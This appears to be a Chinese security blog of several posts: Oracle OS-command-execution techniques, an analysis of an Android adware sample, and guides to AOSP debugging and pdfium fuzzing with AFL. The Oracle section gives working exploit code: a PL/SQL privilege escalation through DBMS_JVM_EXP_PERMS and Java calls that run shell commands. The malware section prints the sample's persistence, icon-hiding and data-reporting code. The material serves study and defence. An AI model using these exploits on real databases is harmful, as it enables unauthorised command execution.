    状态,是给oracle的工程师使用的,主要用于调试和性能调优。可以使用 oradebug help
    命令,查看oradebug的用法
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
SQL> oradebug help
HELP           [command]                 Describe one or all commands
SETMYPID                                 Debug current process
SETOSPID       <ospid>                   Set OS pid of process to debug
SETORAPID      <orapid> ['force']        Set Oracle pid of process to debug
SETORAPNAME    <orapname>                Set Oracle process name to debug
SHORT_STACK                              Get abridged OS stack
CURRENT_SQL                              Get current SQL
DUMP           <dump_name> <lvl> [addr]  Invoke named dump
DUMPSGA        [bytes]                   Dump fixed SGA
DUMPLIST                                 Print a list of available dumps
EVENT          <text>                    Set trace event in process
SESSION_EVENT  <text>                    Set trace event in session
DUMPVAR        <p|s|uga> <name> [level]  Print/dump a fixed PGA/SGA/UGA variable
DUMPTYPE       <address> <type> <count>  Print/dump an address with type info
SETVAR         <p|s|uga> <name> <value>  Modify a fixed PGA/SGA/UGA variable
PEEK           <addr> <len> [level]      Print/Dump memory
POKE           <addr> <len> <value>      Modify memory
WAKEUP         <orapid>                  Wake up Oracle process
SUSPEND                                  Suspend execution
RESUME                                   Resume execution
FLUSH                                    Flush pending writes to trace file
CLOSE_TRACE                              Close trace file
TRACEFILE_NAME                           Get name of trace file
LKDEBUG                                  Invoke global enqueue service debugger
NSDBX                                    Invoke CGS name-service debugger
-G             <Inst-List | def | all>   Parallel oradebug command prefix
-R             <Inst-List | def | all>   Parallel oradebug prefix (return output
SETINST        <instance# .. | all>      Set instance list in double quotes
SGATOFILE      <SGA dump dir>         Dump SGA to file; dirname in double quotes
DMPCOWSGA      <SGA dump dir> Dump & map SGA as COW; dirname in double quotes
MAPCOWSGA      <SGA dump dir>         Map SGA as COW; dirname in double quotes
HANGANALYZE    [level] [syslevel]        Analyze system hang
FFBEGIN                                  Flash Freeze the Instance
FFDEREGISTER                             FF deregister instance from cluster
FFTERMINST                               Call exit and terminate instance
FFRESUMEINST                             Resume the flash frozen instance
FFSTATUS                                 Flash freeze status of instance
SKDSTTPCS      <ifname>  <ofname>        Helps translate PCs to names
WATCH          <address> <len> <self|exist|all|target>  Watch a region of memory
DELETE         <local|global|target> watchpoint <id>    Delete a watchpoint
SHOW           <local|global|target> watchpoints        Show  watchpoints
DIRECT_ACCESS  <set/enable/disable command | select query> Fixed table access
CORE                                     Dump core without crashing process
IPC                                      Dump ipc information
UNLIMIT                                  Unlimit the size of the trace file
PROCSTAT                                 Dump process statistics
CALL           [-t count] <func> [arg1]...[argn]  Invoke function with arguments

功能非常丰富, 下面我们用到的是 CALL 可以直接调用oracle进程使用的函数。

执行的语句

oradebug setmypid; oradebug call system "/usr/bin/whoami >/tmp/ret";

注意

  1. 这里权限要求是SYSDBA
  2. 双引号里必须是使用TAB而不能使用空格
  3. Linux 和 Windows 下的ORACLE都能利用成功
  1. 黑客方法

下面用到的两个方法是David Litchfield 在Blackhat DC 2010 上公开两个方法,通过逆向
发现。结合DBMS_JVM_EXP_PERMS的漏洞可以直接执行系统命令(DBMS_JVM_EXP_PERMS 漏洞
已经被被修复)

1
2
3
4
5
6
7
8
9
10
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,'java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,'ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

在有漏洞的DBMS_JVM_EXP_PERMS package的Oracle上执行上述语句,有create session
权限的用户可以给自己授权所有java 权限。

2.1 DBMS_JAVA_TEST.FUNCALL

2.1.1 执行的语句

1
Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual;

2.1.2 需要的权限

1
exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');

2.1.3 受影响系统

11g R1, 11g R2

2.2 DBMS_JAVA.RUNJAVA

2.2.1 执行的语句

1
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL;

2.2.2 需要的权限

1
exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');

2.2.3 受影响系统

10g R2, 11g R1, 11g R2

参考链接

  1. Using Java to run os command
  2. DBMS_SCHEDULER
  3. oradebug
  4. BlackHat-DC-2010-Litchfield-Oracle11g
  5. Hacking Oracle from the Web

发表于

概况

  • MD5: 14792786094250715197540fd3b58439
  • SHA256: 456caeaaa8346c7a9e2198af5a0ca49d87e616a2603884580df22728a49893d7
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1208868505 (0x480dde99)
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=CN, ST=sc, L=sc, O=maizi, OU=maizi, CN=pktool
        Validity
            Not Before: Sep  9 09:11:13 2015 GMT
            Not After : Jan 25 09:11:13 2043 GMT
        Subject: C=CN, ST=sc, L=sc, O=maizi, OU=maizi, CN=pktool
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:93:57:2d:52:af:c1:71:cf:7a:cb:2f:6a:6c:0a:
                    b2:3f:4b:60:a6:a7:d0:9d:ba:36:a1:0f:0d:cc:9e:
                    32:ea:23:df:80:a3:b3:9f:2b:93:b9:53:c4:e5:bf:
                    05:32:21:23:c1:13:78:b0:72:08:19:8e:5e:c0:a0:
                    13:11:19:d6:23:8a:b6:44:2b:73:e0:1d:f3:b3:f4:
                    ab:6c:2e:af:78:2f:8b:e2:dc:b0:d6:06:af:8e:3f:
                    29:54:1a:59:44:55:73:98:2f:fd:8b:18:b0:de:c6:
                    9c:ee:0c:c7:f7:04:9d:0c:a7:62:06:45:4f:08:20:
                    2e:ca:a9:20:88:0e:08:2b:f1:9c:a9:24:5d:35:85:
                    02:bb:c0:ff:37:98:4b:c7:6f:f2:75:81:43:78:f8:
                    4b:cc:63:8c:f5:0e:c9:95:05:3d:ee:a1:85:cd:94:
                    97:b8:48:93:02:b3:71:6e:fb:39:6f:63:5d:a7:24:
                    c1:dc:77:a9:9c:de:5d:76:63:a8:ad:1d:e9:d6:84:
                    9b:ee:8d:37:38:4b:7c:ff:94:c9:df:dd:17:80:8c:
                    e8:d1:94:5d:05:dc:ef:d8:dc:90:4c:8b:75:22:6d:
                    57:6e:ee:4c:5f:62:96:5c:72:64:a4:5b:0f:29:e0:
                    f3:31:11:99:6a:b4:e5:6c:16:4d:8a:44:46:06:8f:
                    06:05
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Subject Key Identifier: 
                A6:8F:86:BB:A7:0A:DB:29:2E:E9:26:A6:F1:8C:BF:2F:4B:58:99:39
    Signature Algorithm: sha256WithRSAEncryption
         82:62:98:a8:39:10:3b:f5:09:42:97:de:e9:4c:57:6c:4e:58:
         a3:1a:31:29:a4:79:98:3f:c9:68:3c:e5:90:be:7f:b0:98:2b:
         8f:95:9e:4e:d2:bc:82:6e:bf:32:56:35:87:c8:19:08:ae:af:
         9c:db:94:71:d4:db:73:d9:25:e2:e5:f1:92:a0:a4:c4:bd:27:
         21:b2:c8:ec:e2:2a:c3:bb:a2:85:97:78:2b:4a:94:cc:fc:dc:
         75:6a:11:c8:ba:da:30:be:11:e9:e7:4a:5e:e1:ae:af:4d:36:
         14:69:31:ab:68:16:69:ed:a8:bb:c7:be:bf:8b:ca:4c:01:d0:
         7e:65:45:31:72:0f:7b:8d:7e:76:40:86:45:8d:ee:a3:b2:ee:
         ac:d3:0e:60:29:b0:fd:dc:8c:6a:25:06:01:99:81:96:f5:4c:
         1d:1a:1d:dc:0e:4b:66:15:80:e8:f5:1c:cd:98:60:71:08:de:
         f9:4f:69:b0:22:ec:05:18:6b:cd:5a:05:ce:3a:fe:57:4b:e7:
         8b:64:b4:f7:4a:cd:63:c1:03:01:e2:b0:aa:81:2d:89:e1:4d:
         da:fb:8f:b9:37:02:ad:85:64:de:87:73:1a:7a:36:50:3f:e6:
         9a:73:65:a0:33:af:81:c6:c8:55:89:e6:a8:03:6a:c6:da:f0:
         a5:cc:1c:6e

样本通过apktool重打包激情浏览器,引诱下载达到感染的目的。样本安装后启动两个服务常驻手机,
通过广告来获得经济收益,安装应用后访问以下链接:

1
2
3
4
5
6
http://dw.cnscns.com/upload/adIcon/2015-10-07/55c01eff-e66a-4186-9658-977d025c5395.png
http://dw.cnscns.com/upload/adOnline/2015-10-07/db90fe85-dd23-4674-9bbc-767c978acb8c.jpg
http://dw.cnscns.com/upload/adIcon/2015-09-06/eccb1bfd-7c3a-44a3-bfc8-e559eb995b49.png
http://dw.cnscns.com/upload/adOnline/2015-09-06/2cd2516c-6f55-4d99-8913-e121fd34abbd.jpg
http://dw.cnscns.com/upload/adIcon/2015-06-18/a7a41435-51e6-4a02-8bb5-1d96edf1a403.png
http://dw.cnscns.com/upload/adOnline/2015-09-19/2e3fe3ec-8043-4a03-ac6d-6b815dc2c144.jpg

http://dw.cnscns.com 是一个移动广告平台。

分析

关键的地方是两个service和一个Receiver

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<service android:name="net.tend.dot.DZS" />
<service android:exported="true" android:name="net.tend.dot.DZK" android:process=":daemon" />
<activity android:configChanges="keyboard|keyboardHidden|orientation|screenSize" android:excludeFromRecents="true" android:launchMode="singleInstance" android:name="net.tend.dot.DZA" android:theme="@android:style/Theme.Translucent.NoTitleBar" />
<receiver android:name="net.tend.dot.DZR">
<intent-filter>
    <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
    <action android:name="android.intent.action.USER_PRESENT" />
    <action android:name="com.dz.downloadmanager" />
    <action android:name="action.dz.start" />
</intent-filter>
<intent-filter>
    <action android:name="android.intent.action.PACKAGE_ADDED" />
    <action android:name="android.intent.action.PACKAGE_REMOVED" />
    <data android:scheme="package" />
</intent-filter>
</receiver>

但是这两个Service和Receiver的代码并不在App代码中,而是在动态加载的dex中,其中的对于关系如下:

  • net.tend.dot.DZS -> mkit.dz.vol.MFSS
  • net.tend.dot.DZK -> mkit.dz.vol.MFKS
  • net.tend.dot.DZR -> mkit.dz.vol.MFBR
  • net.tent.dot.DZA -> mkit.dz.vol.MFAC

而动态加载的dex 由 assets/dzsm 解密而来。样本的文件转换图如下:

assets/dzsm 使用DES加密,文件的前32个字节为key,后面的为加密的内容,可以使用下面的java代码进行
解密。解密出来的文件为dex文件,可以用jeb正常分析。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

import javax.crypto.Cipher;
import javax.crypto.CipherInputStream;
import javax.crypto.CipherOutputStream;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.DESKeySpec;

public class decrypt {

    public static void main(String[] args) {
        try {
            String key = "8q6e81ssaiem1msqii9ixasmumsxxxqq";

            FileInputStream fis2 = new FileInputStream("/tmp/dzsm");
            FileOutputStream fos2 = new FileOutputStream("decrypted");
            decrypt(key, fis2, fos2);
        } catch (Throwable e) {
            e.printStackTrace();
        }
    }

    public static void encrypt(String key, InputStream is, OutputStream os) throws Throwable {
        encryptOrDecrypt(key, Cipher.ENCRYPT_MODE, is, os);
    }

    public static void decrypt(String key, InputStream is, OutputStream os) throws Throwable {
        encryptOrDecrypt(key, Cipher.DECRYPT_MODE, is, os);
    }

    public static void encryptOrDecrypt(String key, int mode, InputStream is, OutputStream os) throws Throwable {

        DESKeySpec dks = new DESKeySpec(key.getBytes());
        SecretKeyFactory skf = SecretKeyFactory.getInstance("DES");
        SecretKey desKey = skf.generateSecret(dks);
        Cipher cipher = Cipher.getInstance("DES");

        if (mode == Cipher.ENCRYPT_MODE) {
            cipher.init(Cipher.ENCRYPT_MODE, desKey);
            CipherInputStream cis = new CipherInputStream(is, cipher);
            doCopy(cis, os);
        } else if (mode == Cipher.DECRYPT_MODE) {
            cipher.init(Cipher.DECRYPT_MODE, desKey);
            CipherOutputStream cos = new CipherOutputStream(os, cipher);
            doCopy(is, cos);
        }
    }

    public static void doCopy(InputStream is, OutputStream os) throws IOException {
        byte[] bytes = new byte[64];
        int numBytes;
        while ((numBytes = is.read(bytes)) != -1) {
            os.write(bytes, 0, numBytes);
        }
        os.flush();
        os.close();
        is.close();
    }

}

MainActivity是 com.dz.browser.WelActivity

1
2
3
4
5
6
7
8
<activity android:icon="@drawable/icon1"
          android:label="@string/main_name"
          android:name="com.dz.browser.WelActivity" android:screenOrientation="portrait">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
    </intent-filter>
</activity>

WelActivity 里干几件事:

1) 隐藏图标

1
2
3
4
5
6
private void setComponentEnabled(Context context, Class arg6, boolean enabled) {
    ComponentName v0 = new ComponentName(context, arg6.getName());
    PackageManager v3 = context.getPackageManager();
    int v1 = enabled ? 1 : 2;
    v3.setComponentEnabledSetting(v0, v1, 1);
}

2) 动态加载dex

1
2
3
4
5
6
7
8
9
10
private void GoMain() {
    new Handler().postDelayed(new Runnable() {
        public void run() {
            WelActivity.this.setComponentEnabled(WelActivity.this, WelActivity.class, false);
        }
    }, 5000);
    Intent v0 = new Intent();
    v0.setClass(((Context)this), GuideActivity.class);
    this.startActivity(v0);
}

GuideActivity 的 onCreate 调用 DZM.getInstance(((Context)this)).init(); 加载 dex。
GuideActivity 同时向广告服务器发送本机信息

1
2
3
4
5
6
7
8
9
10
11
new Thread(new Runnable() {
    public void run() {
        try {
            Log.i("ads", "==" + HttpUtils.post(String.valueOf(Constant.reportUrl) + Utils.getQID(
                    GuideActivity.this), GuideActivity.this.Params.reqparams()));
        }
        catch(PackageManager$NameNotFoundException v1) {
            v1.printStackTrace();
        }
    }
}).start();

http://mob.s2s.nooobi.com/api-mobvista/sdkback%3Fappkey%3DSexTubeMobvista1

1
2
3
4
5
6
7
8
POST /api-mobvista/sdkback?appkey=SexTubeMobvista1 HTTP/1.1
Content-Length: 59
Content-Type: application/x-www-form-urlencoded
Host: mob.s2s.nooobi.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

country=CN&ip=220.231.27.156&model=sdk&imei=000000000000000

同时加载dex还有另外一个入口,通过 Receiver

1
2
3
4
5
6
7
8
9
10
11
12
13
<receiver android:name="net.tend.dot.DZR">
    <intent-filter>
        <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
        <action android:name="android.intent.action.USER_PRESENT" />
        <action android:name="com.dz.downloadmanager" />
        <action android:name="action.dz.start" />
    </intent-filter>
    <intent-filter>
        <action android:name="android.intent.action.PACKAGE_ADDED" />
        <action android:name="android.intent.action.PACKAGE_REMOVED" />
        <data android:scheme="package" />
    </intent-filter>
</receiver>

当网络变化,用户锁屏等操作时将自动加载dex

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

public class DZR extends BroadcastReceiver {
    public DZR() {
        super();
    }

    private void a(Context context, Intent intent) {
        try {
            a.a(context, i.class).onReceive(context, intent);
        }
        catch(Exception v0) {
            Log.e("ads", "", ((Throwable)v0));
        }
    }

    public void onReceive(Context context, Intent intent) {
        Context context = context.getApplicationContext();
        String action = intent.getAction();
        System.out.println("SV=" + dzm_version.DZM_1_2_5);
        if(action.equals("android.intent.action.USER_PRESENT")) {
            DZM.getInstance(context);
        }

        l.start_thread(context);
        if(l.str_dzmb_kiup_act().equals(action)) {
            l.loadDex(context, intent);
        }
        else {
            this.a(context, intent);
        }
    }
}
1
2
3
4
5
6
<receiver android:name="com.dz.browser.MyReceiver">
<meta-data android:name="android.app.device_admin" android:resource="@xml/lockourscreen" />
<intent-filter>
    <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
</intent-filter>
</receiver>

lockourscreen.xml 里申请了锁屏权限

1
2
3
4
5
<device-admin xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-policies>
        <force-lock />
    </uses-policies>
</device-admin>

但是Receiver里什么也没有干,这只是为了阻止普通用户卸载app。

样本会访问下面URL 获得ip地址信息

http://ip.taobao.com/service/getIpInfo2.php?ip=myip

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
{
code: 0,
data: {
country: "中国",
country_id: "CN",
area: "华北",
area_id: "100000",
region: "北京市",
region_id: "110000",
city: "北京市",
city_id: "110100",
county: "",
county_id: "-1",
isp: "华瑞信通",
isp_id: "1000146",
ip: "220.231.27.156"
}
}

从分析看样本主要是获取广告,下载apk,安装apk 这几个功能,还可以使用浏览器打开指定URL

daemon 分析

两个服务中,daemon 是 arm elf 可执行文件,app安装后自动执行。daemon程序由 dz.jar 的 assets/oilive 释放出来。
在手机上得到下面的命令行

1
/data/data/org.dz.passion.browser/app_bin/daemon -p org.dz.passion.browser -s net.tend.dot.DZK -t 120

daemon 使用说明

usage: %s -p package-name -s daemon-service-name -t interval-time

daemon 进程的父进程是init,结束应用进程不会结束daemon进程,将应用进程结束后过120秒,daemon将会重新自动启动
服务程序。

1
2
3
u0_a45    999   36    193564 32452 ffffffff 40033a40 S org.dz.passion.browser:daemon
u0_a45    1016  36    192640 35772 ffffffff 40033a40 S org.dz.passion.browser
u0_a45    1028  1     728    296   c0099f1c 40032c88 S /data/data/org.dz.passion.browser/app_bin/daemon

这个搞法似类以前的双进程监控,不容易干掉,上面说过启动App就启动两个服务 DZS 和 DZK,而DZK的代码其实在MFKS中,
从下面的代码可以看到,MFKS在Service 的 OnCreate 是就把daemon 运行起来了,daemon 又会检查app的服务的状态,有会自动
启动服务,比较流氓啊!这么做目的还是为了常驻手机,长期运行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
public class MFKS {
    private Service service;

    public MFKS() {
        super();
    }

    public IBinder onBind(Intent arg2) {
        return null;
    }

    public void onCreate() {
        run_daemon.install(this.service.getApplicationContext(), config.get_kvp_classObject(this.service  // net.tend.dot.DZK
                .getApplicationContext()), 120);
        this.service.startService(new Intent(this.service.getApplicationContext(), config.get_svp_classObject(  // net.tend.dot.DZS
                this.service.getApplicationContext())));
    }

    public void onStart(Intent arg1, int arg2) {
    }

    public void setService(Service arg1) {
        this.service = arg1;
    }
}

附录

访问的URL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

http://ip.taobao.com/service/getIpInfo2.php%3Fip%3Dmyip
http://api.nooobi.com/api-unlock/getlockappconfig
http://api.nooobi.com/api-unlock/insertimei
http://mob.s2s.nooobi.com/api-mobvista/sdkback%3Fappkey%3DSexTubeMobvista1
http://api.nooobi.com/api-unlock/getapptype
http://api.nooobi.com/api-unlock/kitup
http://alog.umeng.com/app_logs
http://api.nooobi.com/api-unlock/getadlist
http://dw.cnscns.com/upload/adIcon/2015-10-07/55c01eff-e66a-4186-9658-977d025c5395.png
http://dw.cnscns.com/upload/adOnline/2015-10-07/db90fe85-dd23-4674-9bbc-767c978acb8c.jpg
http://dw.cnscns.com/upload/adIcon/2015-09-06/eccb1bfd-7c3a-44a3-bfc8-e559eb995b49.png
http://dw.cnscns.com/upload/adOnline/2015-09-06/2cd2516c-6f55-4d99-8913-e121fd34abbd.jpg
http://dw.cnscns.com/upload/adIcon/2015-06-18/a7a41435-51e6-4a02-8bb5-1d96edf1a403.png
http://dw.cnscns.com/upload/adOnline/2015-09-19/2e3fe3ec-8043-4a03-ac6d-6b815dc2c144.jpg
http://api.nooobi.com/api-unlock/unlockaction

总结

DZSM 这个样本使用了动态加载dex的技术,使得其检测更加困难。代码结构良好,异常处理充分,
是一个专业程序员的作品。使用了简单的加密技术,也是为了逃避检查。

发表于

下载 Android 源代码,编译

1
2
3
4
5
$ source build/envsetup.sh
$ lunch
$ make
$ mmm development/tools/idegen/
$ ./development/tools/idegen/idegen.sh

运行后将生成下面几个文件

  • android.ipr (IntelliJ / Android Studio)
  • android.iml (IntelliJ / Android Studio)
  • .classpath (Eclipse)

1) 在Android Studio 中导入 android.ipr

File -> Open 选择 android.ipr, 导入后可以Android Studio 中浏览AOSP 源码

2)设置远程调试配置文件

Run -> Edit Configuration 点击左上角的 + 类型选择 Remote

3)Attack 到需要调试的进程

这里有两种方法,一是使用SDK 提供的 Monitor 二是使用 Android Studio 自带的
Attach debugger to Android Process 按钮。

连接成功后将看到 Connected to the target VM

4)设置断点

设置断点很简单,用鼠标点击源码文件的左边栏,看见红色圆点说明就已经设置成功了。也
可以使用Ctrl + F8 的快捷键。

5)运行程序,触发断点

需要注意的是在调试过程中会出现源码对不上的情况,需要自己选择正确的源码。关于哪些
进程可以调试的问题,上篇已经有记录,这里就不在说了。

参考资料

  1. AOSP Sources in the IDE
    https://newcircle.com/s/post/1720/aosp_sources_in_the_ide
  2. Debugging AOSP Platform code with Android Studio - Part I - Java Debugger
    http://ronubo.blogspot.sg/2016/01/debugging-aosp-platform-code-with.html

发表于

下载源码

先在 https://pdfium.googlesource.com/pdfium/ 下载源码.

1
2
3
4
5
mkdir repo
cd repo
gclient config --unmanaged https://pdfium.googlesource.com/pdfium.git
gclient sync
cd pdfium

gclient 命令在 depot_tools 中, 需要安装 参考下面的文章

http://www.chromium.org/developers/how-tos/install-depot-tools

1
2
git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
export PATH=`pwd`/depot_tools:"$PATH"

gclient sync 同步时需要fq,可以简单的使用环境变量的方法解决。

https_proxy=http://localhost:8118 gclient sync 下载 download google storage过
程中还会遇到一个网络问题,需要编写配置文件 ~/.boto

1
2
3
[Boto]
proxy = 127.0.0.1  # 不带 http://
proxy_port= 8118

export NO_AUTH_BOTO_CONFIG=~/.boto

源码包非常大,大概有1G多,需要耐心等待。

编译

编译需要使用 ubuntu 或者 Debian 系统,其他系统的依赖问题解决起来比较麻烦,
如果是上面两种操作系统的话,有脚本自动安装依赖。

./build/install-build-deps.sh

安装完所有依赖后就可以开始编译了,首先要先生成 gn 文件 (2016 年google 放弃使用原来的 gyp 编译方式)

gn args out/afl 会调用vim 编译器, 输入下面的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

# Build arguments go here.
# See "gn args <out_dir> --list" for available build arguments.
use_goma = false # Googlers only. Make sure goma is installed and running first.
is_debug = false  # Enable debugging features.

pdf_use_skia = true # Set true to enable experimental skia backend.
pdf_use_skia_paths = false  # Set true to enable experimental skia backend (paths only).

pdf_enable_xfa = true  # Set false to remove XFA support (implies JS support).
pdf_enable_v8 = true  # Set false to remove Javascript support.
pdf_is_standalone = true  # Set for a non-embedded build.
is_component_build = false # Disable component build (must be false)
v8_static_library = true

clang_use_chrome_plugins = false  # Currently must be false.
use_sysroot = false  # Currently must be false on Linux, but entirely omitted on windows.

use_afl = true
#is_asan = true
enable_nacl = true
optimize_for_fuzzing = true
symbol_level=1

要编译生成 pdfium_test, 必须指定 pdf_is_standalone = true, 执行 ninjia -C out/afl pdfium_test

接下来要解决 afl 的问题了, pdfium 的 third_party中不包含 afl-fuzz 的源代码,需要到 chromium.googlesource.com 项目下载。
chromium 项目支持 libfuzzer 和 afl-fuzz,只要使用开关, use_libfuzzer = true
或者 use_afl = true 即可打开。

https://chromium.googlesource.com/chromium/src/third_party/+/master/afl/

可以直接下载 tgz 文件 https://chromium.googlesource.com/chromium/src/third_party/+archive/master/afl.tar.gz
下载后将源码 copy 到 ~/repo/pdfium/third_party/afl 中, 使用 ninja -C out/afl 编译整个项目。

使用 is_debug=false 可以明显提高fuzzing 速度,应该开启。另外一个比较有用的是
symbol_level, 设置 symbol_level=1 可以添加必要的调试符号,便于gdb调试。

在编译 skia backend 支持时,需要额外处理, 使用 C++14

1
use_cxx11 = false

afl-fuzz

随着 chromium 代码的更新, afl 源码编译出现了一些小问题,需要处理。

src/third_party/afl/patches/0001-fix-build-with-std-c11.patch

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
diff --git a/afl-fuzz.c b/afl-fuzz.c
index 01b4afef0ecc..f0d564a33037 100644
--- a/afl-fuzz.c
+++ b/afl-fuzz.c
@@ -23,7 +23,9 @@
 #define AFL_MAIN
 #define MESSAGES_TO_STDOUT
 
+#ifndef _GNU_SOURCE
 #define _GNU_SOURCE
+#endif
 #define _FILE_OFFSET_BITS 64
 
 #include "config.h"
diff --git a/types.h b/types.h
index 784d3a7a286d..d24d1fdd97e8 100644
--- a/types.h
+++ b/types.h
@@ -78,7 +78,7 @@ typedef int64_t  s64;
 #define STRINGIFY(x) STRINGIFY_INTERNAL(x)
 
 #define MEM_BARRIER() \
-  asm volatile("" ::: "memory")
+  __asm__ volatile("" ::: "memory")
 
 #define likely(_x)   __builtin_expect(!!(_x), 1)
 #define unlikely(_x)  __builtin_expect(!!(_x), 0)

afl-fuzz 的使用和其他项目一样。初始的种子文件有几个地方可以获取:

./afl-fuzz -M 01 -m 1024 -i /home/henices/input -o /home/henices/out -x /tmp/pdf.dict -- ./pdfium_test @@

参考资料